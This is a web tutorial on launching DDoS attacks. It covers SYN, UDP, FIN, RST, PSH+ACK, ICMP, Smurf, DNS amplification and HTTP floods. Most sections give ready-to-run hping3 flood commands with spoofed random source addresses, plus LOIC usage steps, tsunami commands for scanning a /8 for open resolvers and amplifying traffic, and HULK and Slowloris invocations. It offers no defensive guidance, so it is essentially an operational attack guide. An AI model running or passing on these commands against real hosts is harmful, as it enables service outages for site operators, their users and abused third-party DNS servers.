DDoS Attack Tutorial and Test Tool Part.1

Attack tools and methods hping3 

Simple SYN Flood

root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE using eth0, addr: xxx.xxx.xxx.xxx, MTU: 1500 HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown

Advanced SYN Flood random source IP, customized data packet size, Window Size value

root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE HPING TARGET_SITE (eth0 xxx.xxx.xxx.xxx): S set, 40 headers + 120 data bytes hping in flood mode, no replies will be shown –flood: sent packets as fast as possible –rand-source: random source address -c –count: packet count -d –data: data size -S –syn: set SYN flag -w –win: winsize (default 64) -p –destport: destination port (default 0)

UDP FLOOD Attack

The UDP protocol is connectionless compare to the TCP protocol. UDP Flood is a flow-based DoS attack, and the principle is straightforward. In a UDPFLOOD attack, the attacker can send a large number of small UDP packets with forged source IP addresses. Although the UDP protocol is not connected, as long as a UDP port is opened to provide related services, the related services can be attacked.

Attack Tools and Methods hping3:

root@kali:~# hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): udp mode set, 28 headers + 0 data bytes hping in flood mode, no replies will be shown –flood: sent packets as fast as possible –rand-source: random source address –udp: UDP mode -p –destport: destination port (default 0)

Attack Tools and Methods LOIC:

Low Orbit Cannon is one of the most popular DOS attack tools. It has a graphical interface, and it is easier to use.

1. Fill in the IP or domain name in the upper left corner of the text box and click Lock on to start parsing the host IP and select it as the attack target.

2. There are ports, threads, mode configuration, attack speed, etc. You can keep the default (port default is 80, thread default is 10, the fastest attack speed), but the attack mode must be your own. The three options: HTTP, TCP, and UDP.

3. Click the "IMMA CHARGIN MAH LAZER" button to start the attack, and the attack status is showed at the bottom.

TCP FIN Flood

When the client establishes a TCP connection with the server, the TCP packet with the FIN mark will be received by the server. Otherwise, it will be discarded.

If the attacker sends it to a server that has not established a TCP connection, the FIN packet will be discarded. Nevertheless,  the server needs to consume resources to process it.

Since it is only necessary to construct such garbage FIN packets and send them, thus, this kind of attack is easy to launch.

Attack Tools and Methods hping3

root@kali:~# hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): F set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown -F stands for setting FIN flag

TCP RST Flood

The RST packet is used to close the TCP link forcibly.

If the attacker captures the traffic from the source to the destination address, he can forge the RST packet (using the correct source address, a destination address, source port, destination port, etc.). This RST packet can close the real connection. In the case of continuous sending, likely, a real connection cannot be established.

Attack Tools and Methods hping3 Uses -R Parameter

root@kali:~# hping3 --flood --rand-source -R -p TARGET_PORT TARGET_IP HPING TARGET_IP (eth0 TARGET_IP): R set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown

PUSH + ACK Flood

By sending a large number of packets marked PUSH and ACK simultaneously, the attacker can prevent the server from responding to legitimate requests.

Attack Tools and Methods hping3 Uses -PA Parameter

root@kali:~# hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP HPING xxx.xxx.xxx.xxx (eth0 xxx.xxx.xxx.xxx): AP set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown -PA stands for setting PSH and ACK flags.

Attack tools and methods: LOIC can also launch this kind of attack. If you select the "TCP" attack mode, PSH+ACK flood will be executed.

ICMP and IGMP Floods

These two attack methods are like UDP Floods, which are traffic-based attacks. By sending a large number of data packets to the target, the target host can be paralyzed.

Attack tools and methods hping3 use -1

root@kali:~# hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP HPING TARGET_IP (eth0 TARGET_IP): icmp mode set, 28 headers + 0 data bytes hping in flood mode, no replies will be shown

DDOS Amplification Attack

The attacker does not directly send the communication packet to the victim, yet sends it to the amplifier and then reflects it to the victim. Utilize the characteristic that the reply packet is larger than the request packet (amplify the flow), forge the source IP address of the request packet, and direct the reply packet to the attacked target.

Amplification attacks must use a connectionless protocol that does not require verification of the source address. Common ones include Smurf attacks (ICMP amplification), DNS amplification attacks, and Fraggle attacks (UDP amplification)

Smurf Attack

The Smurf attack floods the victim host by using an ICMP reply request (ping) packet that sets the reply address to the victim network's broadcast address. Eventually, all hosts on the network respond to this ICMP reply request, resulting in network congestion. The more complicated Smurf changed the source address to the third party's victim, which eventually caused the third party to crash.

Attack Tools and Methods hping3

hping3 --icmp --spoof TARGET_IP BROADCAST_IP

DNS Amplification Attack

By using the DNS server as a springboard to amplify attack traffic, malicious attackers can send a large number of forged query requests to the DNS resolver.

Normal DNS Query:

Source IP address -----DNS query----> DNS server -----DNS reply packet----> Source IP address

DNS attack:

Forged IP address -----DNS query----> DNS server -----DNS reply package----> Forged IP address (attack target)

This attack will cause a denial of service attack to the attacked and cause abnormal traffic to the DNS server. First, you need to collect DNS servers that provide recursive query services.

./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8

Afterward, execute the attack

./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt -s: the target IP address. -n: optional domain name to probe. The default is current hostname. -f : the open recursive DNS servers file for the attack. -p : number of packets to be send per DNS server. The default is 1 packet.

Fraggle attack

The Fraggle attack is a simple modification to the Smurf attack, using UDP response messages instead of ICMP

Application Layer DOS Attack

The application layer attack can also be called as the seventh layer attack. At first, a typical connection establishment request is submitted. After the connection is established, a service request will be submitted to the target server, which consumes server computing resources. Since the network layer's behavior is normal, application-layer DDoS attacks can Effectively avoid application-level detection and filtering.

The protocols that can be exploited include HTTP, HTTPS, DNS, SMTP, FTP, VOIP, and other application-layer protocols that have protocol vulnerabilities that can be used to launch attacks.

HTTP FLOOD

HTTP FLOOD is the most common application layer DOS attack. It is also known as CC attack (Challenge Collapsar), which simulates normal users' request behavior and is closely related to website business.

Attack tools and methods HULK (HTTP stress test tool)

root@kali:~# python hulk.py -site https://TARGET.com/test/

Attack Tools and Methods Slowloris

Target Address

./slowloris.pl -dns TARGET_URL port. /slowloris.pl -dns TARGET_URL -port 80 SOCKT quantity. /slowloris.pl -dns TARGET_URL -port 80 -num 200 timeout. /slowloris.pl -dns TARGET_URL -port 80- num 200 -timeout 30 HTTPS ./slowloris.pl -dns TARGET_URL -port 443 -timeout 30 -num 200 -https

No comments

Related recommendation

No related articles!

微信扫一扫,分享到朋友圈

DDoS Attack Tutorial and Test Tool Part.1